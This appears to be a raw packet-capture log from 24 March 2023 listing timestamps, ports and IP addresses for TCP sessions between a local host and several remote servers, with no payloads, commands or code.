Mar 24, 2023 07:58:02.247746944 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.247821093 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.267461061 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.267499924 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.267611027 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.267648935 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.267697096 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.267704964 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.267738104 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.267760038 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.267781019 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.267796040 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.267810106 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.267834902 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.267873049 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.267889023 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.267914057 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.267972946 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.267985106 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.268022060 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.268048048 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.268387079 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.268414974 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.268476009 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.268486977 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.268532991 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.268574953 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.268646955 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.268678904 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.268728971 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.268739939 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.268784046 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.268806934 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.268910885 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.268935919 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.269002914 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.269013882 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.269063950 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.269089937 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.269239902 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.269268036 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.269316912 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.269325018 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.269370079 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.269406080 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.269493103 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.269524097 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.269563913 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.269573927 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.269603968 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.269628048 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.269764900 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.269790888 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.269840956 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.269850969 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.269865036 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.269911051 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.270108938 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.270137072 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.270172119 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.270184994 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.270205975 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.270235062 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.270379066 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.270411968 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.270453930 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.270464897 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.270522118 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.270534039 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.270852089 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.270891905 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.270941973 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.270953894 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.270975113 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.270994902 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.271440029 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.271477938 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.271523952 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.271534920 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.271569014 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.271574974 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.271593094 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.271605968 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.271632910 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.271634102 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.271670103 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.271711111 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.271780014 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.271822929 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.271863937 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.271888018 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.271928072 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.271940947 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.271970034 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.271994114 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.272120953 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.272149086 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.272211075 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.272222042 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.272241116 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.272250891 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.272274971 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.272283077 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.272310972 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.272346020 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.272524118 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.272631884 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.272707939 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.272777081 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.272880077 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.272953033 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.272973061 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.273000956 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.273041964 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.273056030 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.273070097 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.273083925 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.273093939 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.273103952 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.273124933 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.273132086 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.273169041 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.273181915 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.273222923 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.273282051 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.273426056 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.273449898 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.273497105 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.273509979 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.273538113 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.273567915 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.274194956 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.274225950 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.274272919 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.274287939 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.274318933 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.274333954 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.274359941 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.274390936 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.274424076 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.322062016 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.322098970 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.322211027 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.323173046 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.323213100 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.323271036 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.323296070 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.323389053 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.323405981 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.323432922 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.323467970 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.323486090 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.323530912 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.323580980 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.323597908 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.323718071 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.323868036 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.530723095 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.530849934 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:02.954732895 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:02.954807997 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:03.790751934 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:03.790906906 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.224282980 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.224349976 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.224519014 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.434746981 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.434972048 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.646749973 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.646977901 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.886131048 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.886171103 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886199951 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886240959 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.886255980 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886281013 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.886292934 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886307955 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886320114 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.886328936 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886343002 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886364937 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.886379004 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886401892 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886415958 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.886450052 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886481047 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886498928 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.886516094 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886549950 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.886560917 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886624098 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.886729956 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:04.886745930 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:04.886795044 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:05.094731092 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:05.094836950 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:05.514717102 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:05.514951944 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:06.346754074 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:06.346909046 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:07.391319036 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:07.391366005 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:07.391504049 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:07.598731041 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:07.598807096 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:08.010747910 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:08.010941982 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:08.842741966 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:08.842967033 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:09.864845991 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:09.864913940 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.864939928 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.865099907 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:09.865122080 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.865142107 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.865294933 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:09.865314007 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.865334988 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.865354061 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.865423918 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:09.865433931 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.865528107 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:09.865544081 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.865571022 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.865611076 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:09.865621090 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.865658998 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:09.865735054 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:09.865906000 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:10.070727110 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:10.070852041 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:10.506724119 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:10.506891012 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:11.338728905 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:11.338922024 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:13.002731085 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:13.002944946 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:16.430715084 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:16.430881023 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:22.730794907 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:22.730843067 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:22.730931044 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:22.938739061 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:22.938937902 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:23.370733023 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.370918989 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:23.429568052 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:23.429620981 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.429639101 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.429728985 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:23.429738045 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.429805040 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:23.429812908 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.429826021 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.429836988 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.429845095 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:23.429848909 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.429893017 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:23.429900885 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.429946899 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:23.429953098 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.429970026 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.430003881 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:23.430008888 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.430028915 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.430072069 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:23.430082083 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:23.430182934 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:23.430267096 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:26.307306051 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:31.263485909 CET	80	49710	208.95.112.1	192.168.2.6
Mar 24, 2023 07:58:31.263672113 CET	49710	80	192.168.2.6	208.95.112.1
Mar 24, 2023 07:58:34.398118019 CET	49714	443	192.168.2.6	144.76.136.153
Mar 24, 2023 07:58:34.398175001 CET	443	49714	144.76.136.153	192.168.2.6
Mar 24, 2023 07:58:48.234996080 CET	80	49710	208.95.112.1	192.168.2.6
Mar 24, 2023 07:58:52.343915939 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:58:52.372612953 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:58:52.372849941 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:58:52.952768087 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:58:52.981070042 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:58:53.063859940 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:58:58.639048100 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:58:58.669637918 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:58:58.727530956 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:05.629578114 CET	80	49711	84.252.73.140	192.168.2.6
Mar 24, 2023 07:59:05.629812002 CET	49711	80	192.168.2.6	84.252.73.140
Mar 24, 2023 07:59:05.752609968 CET	80	49713	144.76.136.153	192.168.2.6
Mar 24, 2023 07:59:05.752811909 CET	49713	80	192.168.2.6	144.76.136.153
Mar 24, 2023 07:59:15.153218031 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:15.185329914 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:15.185379028 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:15.185404062 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:15.185451984 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:15.268882036 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:19.266153097 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:19.295511007 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:19.456651926 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:19.482564926 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:19.511385918 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:19.565994024 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:20.636717081 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:20.665967941 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:20.769305944 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:21.187367916 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:21.215223074 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:21.215249062 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:21.215395927 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:21.215394974 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:21.243350029 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:21.243907928 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:21.338948011 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:21.367309093 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:21.367934942 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:21.402017117 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:21.430361032 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:21.432017088 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:21.460306883 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:21.566211939 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:26.668745041 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:26.698410988 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:26.769943953 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:26.815491915 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:26.844382048 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:26.848340034 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:26.876729965 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:26.878343105 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:26.906950951 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:26.957314968 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:27.086250067 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:27.114253044 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:27.114614964 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:27.269829988 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:27.979367018 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.007371902 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.007432938 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.007492065 CET	36108	49720	51.210.161.21	192.168.2.6
Mar 24, 2023 07:59:28.007503033 CET	49720	36108	192.168.2.6	51.210.161.21
Mar 24, 2023 07:59:28.007582903 CET	49720	36108	192.168.2.6	51.210.161.21
